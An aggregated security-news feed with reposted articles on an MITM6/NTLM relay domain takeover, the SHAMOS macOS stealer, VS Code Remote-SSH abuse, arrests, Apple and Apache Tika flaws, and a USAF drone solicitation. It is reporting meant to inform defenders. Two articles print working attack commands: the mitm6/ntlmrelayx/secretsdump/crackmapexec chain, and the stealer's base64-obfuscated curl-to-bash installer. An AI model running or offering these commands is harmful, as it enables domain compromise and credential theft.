1010.cx

  • New MITM6 + NTLM Relay Attack Let Attackers Escalate Privileges and Compromise Entire Domain

    ·

    , ,

    A sophisticated attack chain that combines MITM6 with NTLM relay techniques to achieve full Active Directory domain compromise. 

    The attack exploits Windows’ default IPv6 auto-configuration behavior, allowing attackers to escalate from network access to Domain Admin privileges in minutes. 

    Key Takeaways
    1. Abuses Windows IPv6 auto-config and AD's 10-machine account quota for domain compromise.
    2. Uses mitm6 + ntlmrelayx to create malicious accounts with RBCD to reach Domain Admin quickly.
    3. Fix: Disable IPv6, set ms-DS-MachineAccountQuota = 0, enable signing, deploy DHCPv6 Guard.

    This technique poses significant risks to organizations running standard Windows environments, as it leverages built-in protocols rather than requiring malware or zero-day exploits.

    IPv6 Auto-Configuration Attack

    Resecurity reports that the MITM6 attack targets a fundamental Windows behavior: automatic DHCPv6 requests sent when systems boot or connect to networks. 

    Even in organizations not actively using IPv6, Windows machines prioritize IPv6 configuration over IPv4, creating an exploitable attack surface.

    Attackers deploy the mitm6 tool to act as a rogue DHCPv6 server, responding to these requests and assigning malicious DNS server addresses to victim machines. 

    The command sudo mitm6 -d target.local –no-ra establishes the attacker as the authoritative DNS server for the target domain.

    Attack chain
    Attack chain

    The attack chain continues with ntlmrelayx from the Impacket toolkit, which intercepts NTLM authentication attempts through WPAD (Web Proxy Auto-Discovery Protocol) spoofing. 

    The tool executes: sudo impacket-ntlmrelayx -ts -6 -t ldaps://target.local -wh fakewpad –add-computer –delegate-access, creating malicious computer accounts and configuring Resource-Based Constrained Delegation (RBCD).

    Active Directory’s default ms-DS-MachineAccountQuota setting allows any authenticated user to add up to 10 machine accounts, enabling attackers to create controlled computer objects, reads the report.

    These accounts can then modify their msDS-AllowedToActOnBehalfOfOtherIdentity attribute, allowing impersonation of privileged accounts, including Domain Administrators.

    Recommendations

    The attack’s impact extends far beyond initial network compromise. Once successful, attackers can extract NTLM hashes using secretsdump.py “target.local/User:Password@target.local” and conduct lateral movement with tools like CrackMapExec: crackmapexec smb 10.0.0.1/8 -u administrator -H 1f937b21e2e0ada0d3d3f7cf58c8aade –share.

    Take Control of Compromised Machines
    Take Control of Compromised Machines

    Organizations face severe consequences, including full domain compromise, credential theft, service disruption, and potential data exfiltration. 

    The attack’s stealthy nature makes detection challenging, as it abuses legitimate Windows protocols.

    Critical mitigation strategies include disabling IPv6 when not required, setting ms-DS-MachineAccountQuota = 0 to prevent unauthorized computer account creation, and enforcing SMB and LDAP signing to prevent relay attacks. 

    Network-level defenses should implement DHCPv6 Guard on switches and routers to block unauthorized IPv6 advertisements.

    This attack demonstrates how default configurations can create significant security vulnerabilities, emphasizing the need for proactive hardening of Active Directory environments and continuous monitoring for rogue network services.

    Safely detonate suspicious files to uncover threats, enrich your investigations, and cut incident response time. Start with an ANYRUN sandbox trial → 

    The post New MITM6 + NTLM Relay Attack Let Attackers Escalate Privileges and Compromise Entire Domain appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • New SHAMOS Malware Attacking macOS Via Fake Help Websites to Steal Login Credentials

    ·

    , ,

    A sophisticated malware campaign targeting macOS users has emerged between June and August 2025, successfully attempting to compromise over 300 customer environments through deceptive help websites.

    The malicious operation deploys SHAMOS, a variant of the notorious Atomic macOS Stealer (AMOS), developed by the cybercriminal group COOKIE SPIDER who operates this information stealer as malware-as-a-service for rent to other cybercriminals.

    The attack begins when unsuspecting users search for common macOS troubleshooting solutions, such as “macos flush resolver cache,” only to encounter promoted malvertising websites in their search results.

    These fraudulent sites, including mac-safer.com and rescue-mac.com, masquerade as legitimate technical support resources while harboring malicious intent.

    The campaign has targeted users across multiple countries including the United States, United Kingdom, Japan, China, Colombia, Canada, Mexico, and Italy, notably excluding Russia due to restrictions within Russian eCrime forums that prohibit targeting Commonwealth of Independent States regions.

    CrowdStrike researchers identified that the threat actors exploit a sophisticated social engineering approach by presenting victims with seemingly helpful instructions for resolving their technical issues.

    However, these instructions contain a critical deception: victims are instructed to execute a malicious one-line terminal command that initiates the malware installation process.

    Search engine results with promoted malvertising website (Source – CrowdStrike)

    The researchers noted that one Google Advertising profile promoting these spoofed websites appears to impersonate a legitimate Australia-based electronics store, suggesting advanced identity spoofing techniques.

    Google advertising profile (Source – CrowdStrike)

    Infection Mechanism and Technical Implementation

    The malware’s infection mechanism relies on a cleverly disguised terminal command that victims unknowingly execute:-

    "curl -fsSL" $ ("echo" "aHR0cHM6Ly9pY2xvdWRzZXJ2ZXJzLmNvbS9nbS9pbnN0YWxsLnNo" | "base64 -d") | "bash"

    This command performs several critical operations in sequence. First, it decodes the Base64-encoded string to reveal the URL https://icloudservers.com/gm/install[.]sh, then downloads and executes a Bash script from this malicious server.

    The script captures the user’s password and subsequently downloads the SHAMOS Mach-O executable from https://icloudservers.com/gm/update.

    Once installed in the /tmp/ directory, SHAMOS employs multiple evasion techniques to avoid detection.

    The malware removes extended file attributes using xattr commands to bypass macOS Gatekeeper security checks, assigns executable permissions through chmod, and conducts anti-virtual machine checks to ensure it is not operating within a security sandbox environment.

    The stealer then executes various AppleScript commands for comprehensive host reconnaissance and data collection.

    SHAMOS specifically targets cryptocurrency wallet files, sensitive credential databases, Keychain data, AppleNotes content, and browser-stored information.

    The malware packages stolen data into a ZIP archive named “out.zip” and exfiltrates it using curl commands to remote servers.

    Additionally, SHAMOS establishes persistence through a Plist file named com[.]finder[.]helper[.]plist saved to the User’s LaunchDaemons directory when sudo privileges are available.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post New SHAMOS Malware Attacking macOS Via Fake Help Websites to Steal Login Credentials appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • 22-year-old Operator of ‘Rapper Bot’ Botnet Charged for Launching 3 Tbps DDoS Attack

    ·

    , ,

    Federal authorities have charged a 22-year-old Oregon man with operating one of the most powerful distributed denial-of-service (DDoS) botnets ever discovered, marking a significant victory in the ongoing battle against cybercriminal infrastructure. Ethan Foltz of Eugene, Oregon, faces federal charges for allegedly developing and administering the “Rapper Bot” DDoS-for-hire service, which has been conducting large-scale […]

    The post 22-year-old Operator of ‘Rapper Bot’ Botnet Charged for Launching 3 Tbps DDoS Attack appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Microsoft VS Code Remote-SSH Extension Hacked to Execute Malicious Code on Developer’s Machine

    ·

    , , , ,

    A critical security vulnerability has been discovered in Microsoft’s VS Code Remote-SSH extension that allows attackers to execute malicious code on developers’ local machines through compromised remote servers. 

    Security researchers have demonstrated how this attack, dubbed “Vibe Hacking,” exploits the inherent trust relationship between remote development environments and local machines, affecting both VS Code and popular forks like Cursor.

    The vulnerability stems from a dangerous misconception among developers who believe remote development environments provide complete isolation. 

    Key Takeaways
    1. VS Code Remote-SSH extension allows attackers to execute malicious code on developers' local machines.
    2. Attackers use built-in commands to open local terminals and automatically run arbitrary code.
    3. Exposing their workstations to compromise when connecting to untrusted servers.

    However, once a server is compromised, attackers can easily pivot to the developer’s local machine through the Remote-SSH extension’s built-in functionality.

    Exploiting Built-in Commands

    Calif reports that the attack leverages two specific VS Code commands that operate within the default configuration settings. 

    Malicious extensions on compromised servers can execute the workbench.action.terminal.newLocal command to open a terminal directly on the developer’s local machine, bypassing the remote environment entirely.

    Attack Chain
    Attack Chain

    Once the local terminal is established, attackers deploy the workbench.action.terminal.sendSequence command to send arbitrary text sequences to the terminal. 

    By appending a newline character, the malicious code executes automatically as if the developer pressed Enter. This technique effectively transforms the trusted development environment into a command and control channel, reads the report.

    The attack works seamlessly because the Remote-SSH extension inherently trusts communications from the remote server. 

    When developers connect to what they believe is an isolated sandbox environment, they unknowingly expose their local machines to potential compromise.

    Mitigation Strategies

    Microsoft has acknowledged these risks on the Remote-SSH extension marketplace page, warning that “a compromised remote could use the VS Code Remote connection to execute code on your local machine”. 

    However, this warning has not prevented widespread adoption of remote development practices, particularly for AI agent deployment and testing.

    Security researchers suggest implementing user approval mechanisms when remote extensions attempt to open local terminals or send keystrokes to active terminals. 

    Monitoring the ~/.cursor-server directory for unauthorized changes can provide limited protection, though this approach offers minimal security if servers are fully compromised.

    The vulnerability highlights the need for secure-by-default designs in development tools that don’t rely on users making complex trust decisions. 

    As remote development continues growing in popularity, addressing these fundamental security issues becomes increasingly critical for protecting developer workstations from sophisticated supply chain attacks.

    Safely detonate suspicious files to uncover threats, enrich your investigations, and cut incident response time. Start with an ANYRUN sandbox trial → 

    The post Microsoft VS Code Remote-SSH Extension Hacked to Execute Malicious Code on Developer’s Machine appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • CISA Issues Four ICS Advisories on Vulnerabilities and Exploits

    ·

    , , ,

    The Cybersecurity and Infrastructure Security Agency (CISA) released four critical Industrial Control Systems (ICS) advisories on August 19, 2025, alerting organizations to current security vulnerabilities and potential exploits affecting critical infrastructure systems. These advisories provide essential information for administrators and security professionals managing industrial control environments. Critical Systems Under Advisory The four newly released advisories […]

    The post CISA Issues Four ICS Advisories on Vulnerabilities and Exploits appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Scattered Spider Hacker Gets 10 Years, $13M Restitution for SIM Swapping Crypto Theft

    ·

    A 20-year-old member of the notorious cybercrime gang known as Scattered Spider has been sentenced to ten years in prison in the U.S. in connection with a series of major hacks and cryptocurrency thefts. Noah Michael Urban pleaded guilty to charges related to wire fraud and aggravated identity theft back in April 2025. News of Urban’s sentencing was reported by Bloomberg and Jacksonville news

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Apple Confirms Critical 0-Day Under Active Attack – Immediate Update Urged

    ·

    , , , , ,

    Apple has issued an emergency security update for iOS 18.6.2 and iPadOS 18.6.2 to address a critical zero-day vulnerability that the company confirms is being actively exploited in sophisticated attacks against targeted individuals. The update, released on August 20, 2025, patches a severe flaw in the ImageIO component that could allow attackers to execute malicious […]

    The post Apple Confirms Critical 0-Day Under Active Attack – Immediate Update Urged appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Critical Flaw in Apache Tika PDF Parser Exposes Sensitive Data to Attackers

    ·

    , , ,

    A critical XML External Entity (XXE) vulnerability has been discovered in Apache Tika’s PDF parser module, potentially allowing attackers to access sensitive data and compromise internal systems. The flaw, tracked as CVE-2025-54988, affects a wide range of Apache Tika deployments and has prompted immediate security advisories from the Apache Software Foundation. Field Value CVE ID […]

    The post Critical Flaw in Apache Tika PDF Parser Exposes Sensitive Data to Attackers appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Apple Patches CVE-2025-43300 Zero-Day in iOS, iPadOS, and macOS Exploited in Targeted Attacks

    ·

    Apple has released security updates to address a security flaw impacting iOS, iPadOS, and macOS that it said has come under active exploitation in the wild. The zero-day out-of-bounds write vulnerability, tracked as CVE-2025-43300, resides in the ImageIO framework that could result in memory corruption when processing a malicious image. “Apple is aware of a report that this issue may have been

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • USAF seeks ‘exact replica’ of Shahed drone to help develop defenses

    ·

    The Air Force wants industry to make an identical copy of the Shahed-136 drone, used by Russia in relentless attacks on Ukraine, to develop and test defenses against the Iranian-designed system.

    The service wants to buy 16 of these Shahed look-alikes, with an option to buy 20 more later, as it pursues the “next generation” of counter-drone programs, according to a request for information posted last week.

    “To support weapons development and integration of these weapon systems, the [U.S. government] requires that the Class 3 unmanned aerial target system be a 1:1 copy (form, fit and function) of a reverse engineered Shahed-136 suicide drone,” the solicitation said. 

    The drone must be an “exact replica” of the Iranian bird with the same profile, shape, payload capacity—about 70 to 100 pounds—and must be able to fly at least 50 miles, according to the solicitation. That’s far less than the Shahed’s range of over a thousand miles, but sufficient for testing purposes.

    Designed in Iran, modified and mass-produced under license by Russia, the Shahed-136 has emerged as a favorite weapon of the invading forces inside Ukraine. Their price tag is estimated at $30,000 to $40,000 apiece, a fraction of the cost of the U.S. and European missiles used to take them down. That imbalance, plus depleted stockpiles of interceptors, has Ukraine and its supporters hunting for cheaper defenses.

    Several U.S. firms have already started designing Shahed-esque offerings for the Pentagon. During a drone demo event at the Pentagon last month, SpektreWorks, an Arizona-based drone manufacturer, showed off its new Low-Cost Uncrewed Combat Attack System, dubbed LUCAS, that can emulate a Shahed. Another firm, Alabama-based Griffon Aerospace, recently unveiled the MQM-172 Arrowhead, marketed as both an attack and target drone.

    While the Air Force provided some guidelines in the solicitation, the government said it won’t provide a technical data package for this requirement, so companies must be able to design and develop their own copy. 

    The solicitation notes that the drone will be sent to the service’s armament directorate, which develops weapons at Eglin Air Force Base in Florida.

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶